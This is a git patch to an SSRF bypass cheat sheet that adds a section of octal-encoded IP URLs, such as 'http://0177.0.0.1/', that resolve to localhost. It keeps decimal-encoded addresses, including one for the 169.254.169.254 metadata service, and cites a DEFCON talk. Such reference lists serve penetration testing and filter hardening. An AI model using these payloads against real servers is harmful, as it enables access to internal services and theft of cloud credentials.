From f4053576f41914d46c29d3b5356921163f5c65ae Mon Sep 17 00:00:00 2001
From: clem9669 <18504086+clem9669@users.noreply.github.com>
Date: Fri, 6 Aug 2021 15:55:55 +0000
Subject: [PATCH] Update SSRF

Adding octal techniques for SSRF.

DEFCON video: https://www.youtube.com/watch?v=_o1RPJAe4kU
---
 Server Side Request Forgery/README.md | 20 +++++++++++++++++++-
 1 file changed, 19 insertions(+), 1 deletion(-)

diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md
index f9c865d..485ee53 100644
--- a/Server Side Request Forgery/README.md	
+++ b/Server Side Request Forgery/README.md	
@@ -12,6 +12,7 @@
   * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
   * [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
   * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
+  * [Bypass using octal IP](#bypass-using-octal-ip)
   * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
   * [Bypass using malformed urls](#bypass-using-malformed-urls)
   * [Bypass using rare address](#bypass-using-rare-address)
@@ -136,13 +137,29 @@ http://127.0.0.0
 ### Bypass using a decimal IP location
 
 ```powershell
-http://0177.0.0.1/
 http://2130706433/ = http://127.0.0.1
 http://3232235521/ = http://192.168.0.1
 http://3232235777/ = http://192.168.1.1
 http://2852039166/  = http://169.254.169.254
 ```
 
+### Bypass using octal IP
+
+Implementations differ on how to handle octal format of ipv4.
+
+```sh
+http://0177.0.0.1/ = http://127.0.0.1
+http://o177.0.0.1/ = http://127.0.0.1
+http://0o177.0.0.1/ = http://127.0.0.1
+http://q177.0.0.1/ = http://127.0.0.1
+...
+```
+
+Ref: 
+- [DEFCON 29-KellyKaoudis SickCodes-Rotten code, aging standards & pwning IPv4 parsing](https://www.youtube.com/watch?v=_o1RPJAe4kU)
+- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
+
+
 ### Bypass using IPv6/IPv4 Address Embedding
 
 [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
@@ -797,6 +814,7 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 
 ## References
 
+- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
 - [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)
 - [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus
 - [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)